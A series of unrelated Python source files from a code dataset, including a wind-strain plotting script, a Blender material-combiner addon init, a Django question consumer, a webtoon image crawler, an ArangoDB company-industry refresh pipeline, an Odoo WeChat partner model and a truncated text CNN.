schmale_data=schmale_data[schmale_data['time']<=max_time]\n \n ground_data=ground_data[min_time<=ground_data['time']]\n ground_data=ground_data[ground_data['time']<=max_time]\n\n points = [(ross_pos_m[0],ross_pos_m[1]),(schmale_pos_m[0],schmale_pos_m[1]),(ground_m[0],ground_m[1])]\n for t in range(ground_data.shape[0]):\n if ground_data.iloc[t]['time'] != schmale_data.iloc[t]['time'] or ground_data.iloc[t]['time'] != ross_data.iloc[t]['time']:\n print('ERROR: Sample Time Inequal @ {0}'.format(t))\n break\n values = [ross_data.iloc[t]['wind_speed'],schmale_data.iloc[t]['wind_speed'],ground_data.iloc[t]['wind_speed']]\n wind_speed = griddata(points,values,(ground_m[0],schmale_pos_m[1]),method='cubic')\n values = [ross_data.iloc[t]['wind_dir'],schmale_data.iloc[t]['wind_dir'],ground_data.iloc[t]['wind_dir']]\n wind_dir = griddata(points,values,(ground_m[0],schmale_pos_m[1]),method='cubic')\n\n u = -wind_speed*np.sin(f.deg2rad(wind_dir))\n v = wind_speed*np.cos(f.deg2rad(wind_dir))\n\n u_schmale = -schmale_data.iloc[t]['wind_speed']*np.sin(f.deg2rad(schmale_data.iloc[t]['wind_dir']))\n v_schmale = schmale_data.iloc[t]['wind_speed']*np.cos(f.deg2rad(schmale_data.iloc[t]['wind_dir']))\n\n u_ground = -ground_data.iloc[t]['wind_speed']*np.sin(f.deg2rad(ground_data.iloc[t]['wind_dir']))\n v_ground = ground_data.iloc[t]['wind_speed']*np.cos(f.deg2rad(ground_data.iloc[t]['wind_dir']))\n\n dudx = 
(u-u_schmale)/dx\n        dudy = (u_ground-u)/dy\n        dvdx = (v-v_schmale)/dx\n        dvdy = (v_ground-v)/dy\n        \n        J = np.array([[dudx,dudy],[dvdx,dvdy]])\n        S = 0.5*(J+J.T)\n        plt_sec_temp.append(ground_data.iloc[t]['time'])\n        s1_temp.append(3600*np.linalg.eig(S)[0].min())\n    \n    plt_sec.append(plt_sec_temp)\n    s1.append(s1_temp)\n\nx=np.arange(15.82,15.90,0.005)\nfor x in x:\n    plt.axvline(x,color='khaki')\n    \nx=np.arange(13.98,14.06,0.005)\nfor x in x:\n    plt.axvline(x,color='khaki')\n    \nplt.plot(point_time,point_s1,color='C0')\nfor x,y in zip(plt_sec,s1):\n    x=[element/3600 for element in x]\n    plt.plot(x,y,color='C1')\n    yy=np.mean(y)\n    plt.plot([x[0],x[-1]],[yy,yy],color='k')\n#plt.title('s$_{1}$ from WRF TS overlaid with s$_{1}$ from drone flights',**titlefont,y=0.96)\n#plt.title('07-17-2018',**titlefont)#,y=0.96)\nplt.ylim([ymin,ymax])\nplt.xlim([xmin,xmax])\nplt.ylabel('hr$^{-1}$',**labelfont)\nplt.yticks(**tickfont)\nplt.xticks(**tickfont)\nplt.xlabel('Hours Mountain Daylight Time, 07-17-2018',**labelfont)\nplt.grid()#color='gray')\nplt.savefig('s1_comparison_colorado_campaign_WRF.png', transparent=False, bbox_inches='tight',pad_inches=0.02,dpi=300)\n\n\n\n\n\n\n","sub_path":"s1 all days/s1_17.py","file_name":"s1_17.py","file_ext":"py","file_size_in_byte":6175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"328365890","text":"# -*- coding: utf-8 -*-\n# A little program for guessing a hidden number\nfrom random import randint # import the random library\n\n\nsecret = randint(0,20)\nguess = input(\"Enter an integer between 0 and 20: \")\nif int(guess) != secret:\n    print(\"Your guess was wrong, the correct number was \" + str(secret))\nelse:\n    print(\"Congratulations, you guessed the right number!\")\n","sub_path":"ugani-skrito-stevilko.py","file_name":"ugani-skrito-stevilko.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"404846060","text":"# MIT License\n\n# Copyright (c) 2018 shotariya\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nbl_info = {\n 'name': \"Shotariya's Material Combiner\",\n 'description': 'Public Release Material Combiner 2',\n 'author': 'shotariya',\n 'version': (2, 0, 3, 3),\n 'blender': (2, 79, 0),\n 'location': 'View3D',\n # 'warning': '',\n 'wiki_url': 'https://vrcat.club/threads/material-combiner-blender-addon.2255/',\n 'category': 'Object'}\n\niamready = True\n\nimport bpy\nimport os\nfrom subprocess import call\ntry:\n import pip\n try:\n from PIL import Image, ImageChops\n except ImportError:\n call([bpy.app.binary_path_python, '-m', 'pip', 'install', 'Pillow', '--user', '--upgrade'], shell=True)\n iamready = False\nexcept ImportError:\n call([bpy.app.binary_path_python,\n os.path.join(os.path.dirname(os.path.abspath(__file__)), 'get-pip.py'), '--user'], shell=True)\n call([bpy.app.binary_path_python, '-m', 'pip', 'install', 'Pillow', '--user', '--upgrade'], shell=True)\n iamready = False\n\n\nfrom . import developer_utils\nmodules = developer_utils.setup_addon_modules(__path__, __name__, 'bpy' in locals())\n\nimport bpy.utils.previews\nfrom . registration import register_all, unregister_all\n\n\ndef register():\n bpy.utils.register_module(__name__)\n register_all()\n print('Registered {} with {} modules'.format(bl_info['name'], len(modules)))\n\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n unregister_all()\n print('Unregistered {}'.format(bl_info['name']))\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"295317595","text":"import numpy as np\n\n# exponential moving average\nclass EMA:\n def __init__(self, startvalue, halflife):\n self._val = startvalue\n self._lambda = np.power(0.5, 1./halflife)\n\n def get(self):\n return self._val\n\n def update(self, value):\n self._val = self._lambda * self._val + (1-self._lambda) * value\n\n\n# for testing purposes only\nif __name__ == \"__main__\":\n from time import sleep\n ema = EMA(0.5, 2)\n while(1):\n num = np.random.rand()\n ema.update(num)\n print (num, ema.get())\n sleep(0.5)\n\n\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"270046273","text":"#!/usr/bin/env python\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nDARKBLUE = (0, 0, 100)\nYELLOW = (255, 255, 0)\n\n# Game\nGAME = {\n 'NAME': \"My Game\",\n 'TILESIZE': 32,\n 'font': 'comicsansms'\n}\n\n\n# Screen\nSCREEN = {\n # 'WIDTH': 360,\n # 'HEIGHT': 480,\n 'FPS': 60,\n 'BGCOLOR': DARKBLUE\n}\n\n# Walls:\nWALLS = {\n 'layer': 2,\n 'color': GREEN\n}\n\n# Player\nPLAYER = {\n 'layer': 2,\n 'color': YELLOW,\n 'time_to_move': 200,\n 'time_to_forget_move': 2000\n}\n\n# Mobs:\nMOB = {\n 'layer': 3,\n 'color': RED,\n 'time_to_move': 1000\n}\n\nPACDOTS = {\n 'layer': 1,\n 'color': WHITE,\n 'size': (5, 5)\n}\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"531719718","text":"from channels import Group\nfrom 
apps.core.models import Video, Question, UpDownVote\nfrom apps.core.utils import decrypt, encrypt\nfrom apps.core.consumers.utils import get_video, get_data\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nimport json\nimport logging\nimport re\n\nlog = logging.getLogger(\"chat\")\n\n\ndef on_connect(message, pk):\n    video = get_video(pk)\n    if video is not None:\n        message.reply_channel.send({\"accept\": True})\n        Group(video.group_questions_name).add(message.reply_channel)\n        log.debug('Questions websocket connected.')\n\n\ndef on_receive(message, pk):\n    video = get_video(pk)\n    data = get_data(message)\n\n    if not video.closed_date:\n        if set(data.keys()) != set(('handler', 'question', 'is_vote')):\n            log.debug(\"Message unexpected format data\")\n            return\n        else:\n            log.debug('Question message is ok.')\n\n        if not data['handler']:\n            return\n\n        user = User.objects.get(id=decrypt(data['handler']))\n        if data['is_vote']:\n            question = Question.objects.get(id=data['question'])\n            if question.user != user:\n                vote, created = UpDownVote.objects.get_or_create(\n                    user=user, question=question, vote=True\n                )\n                if not created:\n                    vote.delete()\n        else:\n            blackList = settings.WORDS_BLACK_LIST\n            wordList = re.sub(\"[^\\w]\", \" \", data['question'].lower()).split()\n            censured_words = list(set(blackList) & set(wordList))\n            query = data['question']\n\n            if censured_words:\n                for word in censured_words:\n                    query = re.sub(word, '♥', query, flags=re.IGNORECASE)\n            question = Question.objects.create(video=video, user=user,\n                                               question=query)\n            UpDownVote.objects.create(question=question, user=user, vote=True)\n\n        vote_list = []\n        for vote in question.votes.all():\n            vote_list.append(encrypt(str(vote.user.id).rjust(10)))\n\n        Group(video.group_questions_name).send(\n            {'text': json.dumps({'id': question.id,\n                                 'user': encrypt(str(user.id).rjust(10)),\n                                 'voteList': vote_list,\n                                 'html': question.html_question_body(user)})}\n        )\n\n\ndef on_disconnect(message, pk):\n    try:\n        video = Video.objects.get(pk=pk)\n        Group(video.group_questions_name).discard(message.reply_channel)\n        log.debug('Questions websocket disconnected.')\n    except (KeyError, Video.DoesNotExist):\n        pass\n","sub_path":"apps/core/consumers/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"455986922","text":"import base64\nimport glob\nimport os\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass Episode:\n    def __init__(self, episode_id, title, url_thumbnail, rating, created_date, detail, webtoon_id):\n        self.episode = episode_id\n        self.title = title\n        self.url_thumbnail = url_thumbnail\n        self.rating = rating\n        self.created_date = created_date\n        self.detail = detail\n        self.webtoon_id = webtoon_id\n\n    def __repr__(self):\n        return self.title\n\n    def img_download(self):\n        html = requests.get(self.detail).text\n        soup = BeautifulSoup(html, 'lxml')\n\n        selection = soup.select_one('.wt_viewer').select('img')\n\n        headers = {'Referer': 'http://comic.naver.com/webtoon/detail.nhn?titleId=%s' % self.webtoon_id}\n\n        test = ''\n\n        for i in selection:\n\n            response = requests.get(i['src'], headers=headers)\n\n            if re.findall(r'/(.+).jpg', i['src']):\n                file_name = 'saved_data/img/' + self.title + '/' + re.findall(r'/(.+).jpg', i['src'])[0].split('/')[\n                    -1] + '.jpg'\n\n                os.makedirs(os.path.dirname(file_name), exist_ok=True)\n\n                if response.status_code == 200:\n                    print(file_name, 'download')\n                    with open(file_name, 
'w+b') as f:\n                        for chunk in response:\n                            f.write(chunk)\n\n                data_uri = base64.b64encode(open(file_name, 'rb').read()).decode('utf-8').replace('\\n', '')\n                img_tag = '<img src=\"data:image/jpeg;base64,{}\">'.format(data_uri)\n\n                test += img_tag\n\n        # open('saved_data/img/1.html', 'wb').write(response.content)\n\n        file_name = 'saved_data/html/%s' % self.title + '.html'\n        os.makedirs(os.path.dirname(file_name), exist_ok=True)\n\n        with open(file_name, 'wt') as f:\n            f.write(test)\n\n        print(file_name, 'created')\n","sub_path":"app/crawler/data/episode.py","file_name":"episode.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"512135194","text":"#!/home/apollo/anaconda3/bin/python3\n#-*- coding: utf-8 -*-\n#******************************************************************************\n# Author : jtx\n# Create : 2020-03-31 19:05\n# Last modified: 2020-05-27 14:32\n# Filename : company_single_relation_refresh.py\n# Description : run manually after a model update; does a full refresh of the company industry-field classification for the specified industries\n#******************************************************************************\n\nimport configparser\nimport sys\nfrom pymongo import MongoClient\nfrom pymongo import errors\nfrom pyArango.connection import Connection as ArangoConnection\nfrom pyArango.theExceptions import AQLFetchError\nimport pymysql\nimport threading\nfrom queue import Queue\nfrom dateutil import parser\nimport datetime\nimport json\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport re\nimport copy\nimport requests\nimport os\n\nlogging.basicConfig(level=logging.INFO,\n                    format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\nlogger = logging.getLogger(__name__)\n\ndir_path = os.path.dirname(__file__)\nkbp_path = os.path.dirname(dir_path)\nconfig_path = os.path.join(kbp_path,\"config.ini\")\n\ndef set_log():\n    logging.basicConfig(level=logging.INFO) \n    file_log_handler = RotatingFileHandler(os.path.join(dir_path,\"industry_refresh_log.txt\"), maxBytes=1024 * 1024 * 300, backupCount=10)\n    formatter = logging.Formatter('%(asctime)s - %(filename)s - %(lineno)s - %(levelname)s - %(message)s')\n    file_log_handler.setFormatter(formatter)\n    logging.getLogger().addHandler(file_log_handler)\n\nclass RelationPipeline(object):\n\n    def __init__(self):\n\n        self.config = configparser.ConfigParser()\n        self.config.read(config_path)\n        self.arango_con = ArangoConnection(arangoURL=self.config.get(\"arango\",\"arango_url\"),username= self.config.get(\"arango\",\"user\"),password=self.config.get(\"arango\",\"passwd\"))\n        self.arango_db = self.arango_con[self.config.get(\"arango\",\"db\")]\n        self.kb_company = self.arango_db[self.config.get(\"arango\",\"kb_company\")]\n        self.industry_url = self.config.get(\"url\",\"company_classifier\")\n        self._init_division_schema() # init division_schema from mysql\n        self._init_industry_schema()\n        self.count_graph_update = 0 # number of relation records updated in arango\n        self.total = 0 # total number of relations that need to be added for the processed date\n\n    def _init_division_schema(self):\n        '''\n        Load administrative-division entity relations\n        '''\n        self.division_schema = {}\n        sql_conn = pymysql.connect( host = self.config.get(\"mysql\",\"host\") ,\n                                    user = self.config.get(\"mysql\",\"user\") ,\n                                    passwd = self.config.get(\"mysql\",\"passwd\"),\n                                    port = self.config.getint(\"mysql\",\"port\") ,\n                                    db = self.config.get(\"mysql\",\"db\"),\n                                    charset = \"utf8\" )\n        sql_cur = sql_conn.cursor() \n\n        # initialize the relation schema for administrative divisions\n        sql_query_industry = \"select name, id, level, parent_id from {}\".format(self.config.get(\"mysql\",\"res_division\"))\n        sql_cur.execute(sql_query_industry)\n        divisions = sql_cur.fetchall()\n        for division in divisions:\n            
division_name, division_id, division_level, division_parent_id = division\n            self.division_schema[division_name] = {\n                \"relation_type\":\"concept_relation/100004\",\n                \"object_name\":division_name,\n                \"object_type\": \"division\",\n                \"object_id\": division_id\n            }\n\n        sql_cur.close()\n        sql_conn.close()\n        logger.info(\"MYSQL division schema loaded\")\n\n    def _init_industry_schema(self):\n        '''\n        Load the industry schema from the mysql res_industry table\n        '''\n        self.industry_schema = {}\n        sql_conn = pymysql.connect( host = self.config.get(\"mysql\",\"host\") ,\n                                    user = self.config.get(\"mysql\",\"user\") ,\n                                    passwd = self.config.get(\"mysql\",\"passwd\"),\n                                    port = self.config.getint(\"mysql\",\"port\") ,\n                                    db = self.config.get(\"mysql\",\"db\"),\n                                    charset = \"utf8\" )\n        sql_cur = sql_conn.cursor() \n\n        ###################################################################\n        self.all_industries = [\"生物制药\",\"医疗器械\"]# set the industry categories (one or more) to refresh\n        ###################################################################\n        self.update_industries_id = []\n        # initialize the industry / industry-field schema\n        sql_query_industry = \"select name, id, parent_id from {}\".format(self.config.get(\"mysql\",\"res_industry\"))\n        sql_cur.execute(sql_query_industry)\n        labels = sql_cur.fetchall()\n        for industry in labels:\n            industry_name, industry_id, parent_id = industry\n            self.industry_schema[industry_id] = {\n                \"relation_type\":\"concept_relation/100011\",\n                \"object_name\":industry_name,\n                \"object_type\": \"industry\",\n                \"object_id\": industry_id,\n                \"object_parent_id\": parent_id\n            }\n            if industry_name in self.all_industries:\n                self.update_industries_id.append(industry_id)\n\n        sql_cur.close()\n        sql_conn.close()\n        logger.info(\"MYSQL industry schema loaded\")\n\n\n\n    def get_related_industry_tags(self, industry_id):\n        '''\n        Recursively return the field tag and all parent-field tags for a sub-field\n        '''\n        relations = []\n        # skip fields whose definition does not match the graph\n        if not industry_id in self.industry_schema:\n            return relations\n        \n        relations.append(self.industry_schema[industry_id])\n        parent_id = self.industry_schema[industry_id][\"object_parent_id\"]\n        while (parent_id):\n            node = self.industry_schema[parent_id]\n            relations.append(node)\n            parent_id = node[\"object_parent_id\"]\n        return relations\n\n\n    def query_process_company(self, process_date):\n        \n        if process_date == \"yesterday\":\n            process_date = (datetime.date.today() - datetime.timedelta(days=1)).strftime(\"%Y-%m-%d\")\n        \n        elif process_date == \"today\":\n            process_date = datetime.date.today().strftime(\"%Y-%m-%d\")\n        \n        elif len(process_date.split(\"-\")) == 3:\n            process_date = process_date\n        \n        else:\n            raise Exception(\"invalid argument\")\n        \n        self.process_date = process_date\n        iso_date_str = process_date + 'T00:00:00+08:00'\n        iso_date = parser.parse(iso_date_str)\n\n        aql = \"FOR company IN {} filter company.create_time>='2020-04-24 12:57:37.408114' SORT company.create_time return company\".format(\n            self.config.get(\"arango\",\"kb_company\"), iso_date) \n        \n        try:\n            res = self.arango_db.fetch_list(aql)\n        except AQLFetchError as e:\n            '''fetch_list raises an exception when no data is found'''\n            res = []\n            logger.warning(\"no data found in the Arango company collection: %s\", e)\n\n        self.total = len(res) \n        logger.info(\"[{}], found [{}] pending records in the company knowledge base\".format(process_date, self.total))\n        return res\n\n\n    def process_division_rel(self, properties):\n        div_rel = []\n        province = properties[\"province\"]\n        city = properties[\"city\"]\n        area = properties[\"area\"]\n\n        if province and province in self.division_schema.keys():\n            if province in [\"北京市\",\"上海市\",\"重庆市\",\"天津市\"]:\n                province = province.replace(\"市\",\"\")\n            div_rel.append(self.division_schema[province])\n\n        if 
city and city in self.division_schema.keys():\n            div_rel.append(self.division_schema[city])\n\n        if area and area in self.division_schema.keys():\n            div_rel.append(self.division_schema[area])\n\n        return div_rel\n\n    \n    def process_industry_rel(self,properties):\n        '''\n        Add industry-field tags resolved to graph ids\n        '''\n        industry_tags = []\n\n        industry_field_tags = []\n        company = properties[\"name\"]\n        #all_industries = [\"人工智能\",\"光电产业\",\"新能源汽车\",\"医疗器械\"]#2020-05-27up\n        post_data = {\n            \"company_list\": [ company ],\n            \"industry_list\":self.all_industries\n        }\n        if not self.all_industries:# no industries specified, default to all\n            post_data['industry_list'] = 'all'\n        try:\n            res = requests.post(self.industry_url, data=json.dumps(post_data))\n\n            if res.status_code == 200:\n                tags = res.json().get(\"body\")[0]\n                industry_field_tags.extend(tags)\n                logger.info(\"classification returned by the api=[{}]\".format(industry_field_tags))\n\n        except Exception as e:\n            logging.error(\"failed to get industry fields for company=[{}], api=[{}]: {}\".format(company,self.industry_url,e))\n\n        for field in industry_field_tags:\n            for industry_node in self.get_related_industry_tags(field[\"id\"]):\n                if industry_node not in industry_tags:\n                    industry_tags.append(industry_node)\n\n        logger.info(\"adding all industry-field relations=[{}]\".format(industry_tags))\n\n        return industry_tags\n\n    def process_channel_rel(self, properties):\n        '''Add relations to channel entities'''\n        channel_rel = []\n        sql_conn = pymysql.connect( host = self.config.get(\"mysql\",\"host\") ,\n                                    user = self.config.get(\"mysql\",\"user\") ,\n                                    passwd = self.config.get(\"mysql\",\"passwd\"),\n                                    port = self.config.getint(\"mysql\",\"port\") ,\n                                    db = self.config.get(\"mysql\",\"db\"),\n                                    charset = \"utf8\" )\n        sql_cur = sql_conn.cursor() \n        # query channel info related to the company\n        sql_state = self.config.get(\"mysql\",\"company_channel_query\").replace(\"eq\",\"=\").format(properties[\"name\"])\n        sql_cur.execute(sql_state)\n        datas = sql_cur.fetchall()\n        for data in datas:\n            company_name, channel_name, channel_id = data\n            rel = {\n                \"relation_type\":\"concept_relation/100010\",\n                \"object_name\":channel_name,\n                \"object_type\": \"channel\",\n                \"object_id\": channel_id,\n            }\n            channel_rel.append(rel)\n\n        sql_cur.close()\n        sql_conn.close()\n        return channel_rel\n\n\n    \n\n    def process_relations(self, properties):\n        '''\n        Manually refresh all industry-field classifications for the full set of companies\n        '''\n        relations = []\n\n        industry_rel = self.process_industry_rel(properties)\n        relations.extend(industry_rel)\n\n        return relations\n\n    def process_relation_company(self, input_q):\n\n        while input_q.empty() is not True:\n            company = input_q.get()\n            company_key = company[\"_key\"]\n            \n            relations = [] \n            # get the new industry-field classification\n            relations = self.process_relations(company[\"properties\"])\n            try:\n                doc = self.kb_company[company_key]\n                old_relations = doc[\"relations\"]\n\n                for relation in copy.deepcopy(old_relations):\n                    for object_id in self.update_industries_id:\n                        if object_id in relation[\"object_id\"]:# this category or one of its sub-categories was found\n                            old_relations.remove(relation)\n                # merge in the new industry-field classification data\n                relations.extend(old_relations) \n                doc[\"relations\"] = relations\n                doc[\"update_time\"] = datetime.datetime.today()\n                doc.save()\n                self.count_graph_update += 1\n\n                if self.count_graph_update % 100 == 0 or self.count_graph_update == self.total:\n                    logger.info('#'*60)\n                    logger.info(\"relations added for the first [{}] companies, [{}] still in the queue\".format(self.count_graph_update,input_q.qsize()))\n                    logger.info('#'*60)\n            except Exception as e:\n                logger.error(\"failed to add company relations, company=[{}]: {}\".format(company[\"name\"],e))\n            input_q.task_done()\n\n\n    \n    \n    def process(self, scan_date):\n\n        process_companies = self.query_process_company(scan_date)\n\n        count = 0\n\n        # process company info from the arango database\n        input_q = Queue()\n        for company in 
process_companies:\n\n            logger.info(\"processing company relations, company=[{}]\".format(company[\"name\"]))\n\n            input_q.put(company)\n            count += 1\n        logger.info(\"found {} companies in the staging db, added to the queue#################################\".format(count))\n        for _ in range(4):\n            thread = threading.Thread(target=self.process_relation_company,args=(input_q,))\n            thread.daemon = True # exits together with the main thread\n            thread.start()\n        input_q.join()\n        \n        logger.info(\"date [{}]: found {} companies in the staging db, updated relations for {} companies in the arango company collection\".format(\n            self.process_date, self.total, self.count_graph_update))\n\nif __name__==\"__main__\":\n\n    # earliest date 2019-06-03\n\n    rel = RelationPipeline()\n    if len(sys.argv) > 1:\n        rel.process(sys.argv[1])\n    else:\n        rel.process(\"yesterday\")\n","sub_path":"company/company_single_relation_refresh.py","file_name":"company_single_relation_refresh.py","file_ext":"py","file_size_in_byte":13486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"653125132","text":"# coding=utf-8\nimport logging\n\nfrom geopy.distance import vincenty\n\nfrom odoo import models, fields, api\n\n_logger = logging.getLogger(__name__)\n\n\nclass WXResPartner(models.Model):\n    _inherit = 'res.partner'\n\n    wxcorp_user_id = fields.Many2one('wx.corpuser', 'Linked enterprise WeChat user')\n    wx_user_id = fields.Many2one('wx.user', 'WeChat official account user')\n    wxlatitude = fields.Float('Latitude', digits=(10, 7))\n    wxlongitude = fields.Float('Longitude', digits=(10, 7))\n    wxprecision = fields.Float('Location precision', digits=(10, 7))\n    location_write_date = fields.Datetime(\"Update time\", readonly=True)\n    wx_address = fields.Char(u'Address', compute='_get_address')\n    near_team = fields.Char(u'Nearby store', compute='_get_near_team')\n\n    @api.one\n    def _get_near_team(self):\n        _logger.info(self)\n\n    @api.one\n    def _get_address(self):\n        # get the user's location\n        from ..controllers import amapapi\n        if self.wxlatitude and self.wxlongitude:\n            wx_location = '%s,%s' % (self.wxlongitude, self.wxlatitude)\n            convert_location = amapapi.coordinateconvert(self, wx_location)\n            location = convert_location.split(';')[0]  # the user's true location\n            formatted_address = amapapi.geocoderegeo(self, location)\n            if formatted_address:\n                self.wx_address = formatted_address['formatted_address']\n            newport_ri = (location.split(',')[1], location.split(',')[0])\n            crm_team_pool = self.env['crm.team'].search([])\n            search_read_new = []\n            for crm_team in crm_team_pool:\n                if crm_team.longitude != 0.0 or crm_team.longitude != 0.0:\n                    cleveland_oh = (crm_team.latitude, crm_team.longitude)\n                    pos_kilometers = vincenty(newport_ri, cleveland_oh).kilometers\n                    crm_team.distance = pos_kilometers\n                    search_read_new.append(crm_team)\n                    # _logger.info(\"distance from store to user %s\" % pos_kilometers)\n            if search_read_new:\n                min_distance = (min(search_read_new, key=lambda dict: dict['distance']))\n                self.near_team = '%s: %s km away' % (min_distance.street, min_distance.distance)\n        _logger.info(\"fetched store info\")\n\n    # def _compute_im_status(self):\n    #     super(WXResPartner, self)._compute_im_status()\n\n    def send_corp_msg(self, msg):\n        from ..rpc import corp_client\n        entry = corp_client.corpenv(self.env)\n        mtype = msg[\"mtype\"]\n        if mtype == \"text\":\n            entry.client.message.send_text(entry.current_agent, self.wxcorp_user_id.userid, msg[\"content\"])\n        if mtype == \"card\":\n            entry.client.message.send_text_card(entry.current_agent, self.wxcorp_user_id.userid, msg['title'],\n                                                msg['description'], msg['url'], btntxt=msg.get(\"btntxt\", \"Details\"))\n        elif mtype == 'image':\n            ret = entry.client.media.upload(mtype, msg['media_data'])\n            entry.client.message.send_image(entry.current_agent, self.wxcorp_user_id.userid, ret['media_id'])\n        elif mtype == 'voice':\n            ret = 
entry.client.media.upload(mtype, msg['media_data'])\n            entry.client.message.send_voice(entry.current_agent, self.wxcorp_user_id.userid, ret['media_id'])\n\n    def get_corp_key(self):\n        if self.wxcorp_user_id:\n            return self.wxcorp_user_id.userid\n\n    def get_wx_key(self):\n        if self.wx_user_id:\n            return self.wx_user_id.openid\n\n    @api.multi\n    def write(self, vals):\n        resusers = super(WXResPartner, self).write(vals)\n        if vals.get('wx_user_id') and self.user_ids.wx_user_id.id != vals.get('wx_user_id'):\n            self.user_ids.wx_user_id = vals.get('wx_user_id')\n            self.user_ids.wx_id = self.user_ids.wx_user_id.openid\n        return resusers\n","sub_path":"e2yun_addons/odoo12/wx_tools/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"608885414","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\nimport os.path\n\nimport pymysql\n\ndb = pymysql.connect(\"localhost\",\"root\",\"krnick\",\"DataMining\",charset=\"utf8\" )\ncursor = db.cursor()\n\nfor dirPath, dirNames, fileNames in os.walk(\"./newkeyword\"):\n    for filename in fileNames:\n        if(filename.endswith(\".txt\") and filename!=\"words.txt\"):\n            f=open(\"./newkeyword/\"+filename,'r')\n            filecontent=str(f.read())\n            f.close()\n            print(filename)\n            print(filecontent)\n\n            cursor.execute('''INSERT INTO file(filename,content) VALUES (%s,%s)''',(filename,filecontent) )\n            db.commit()\n\t\t\t\n","sub_path":"store_content.py","file_name":"store_content.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"113223454","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author : Jan Yang\n@software: PyCharm Community Edition\n\"\"\"\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef test_webpage(url):\n    \"\"\"Check how a web page responds, adding headers to mimic a browser\"\"\"\n    # build the request header info\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36'}\n    response = requests.get(url, headers=headers) # send the request with the headers attached\n    # response = requests.get(url)\n    soup = BeautifulSoup(response.text, 'lxml')\n\n    print(response.status_code) # print the status code\n    print(response.request.headers) # print the request headers\n    print(soup.head.title.text) # print the page title\n\n\nif __name__ == '__main__':\n    test_webpage('http://blog.csdn.net/wswzjdez/article/details/5694942')\n    # test_webpage('http://www.cec.com.cn/')\n","sub_path":"Python3/ch05/5.2-add_headers.py","file_name":"5.2-add_headers.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"271711241","text":"import argparse\nfrom math import ceil\nimport copy\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchtext\nfrom torchtext.vocab import Vectors, GloVe\nimport pdb\n\ntorch.manual_seed(42)\n\ndef validate(model, val_iter):\n    correct, total = 0.0, 0.0\n    for batch in val_iter:\n        probs = model(batch.text.t_())\n        _, argmax = probs.max(1)\n        for i, predicted in enumerate(list(argmax.data)):\n            if predicted+1 == batch.label[i].data[0]:\n                correct += 1\n            total += 1\n    return correct / total\n\nclass CNN(nn.Module):\n\n    def __init__(self, model=\"non-static\", vocab_size=None, embedding_dim=128, class_number=None,\n                 feature_maps=100, filter_windows=[3,4,5], dropout=0.5):\n        super(CNN, self).__init__()\n\n        
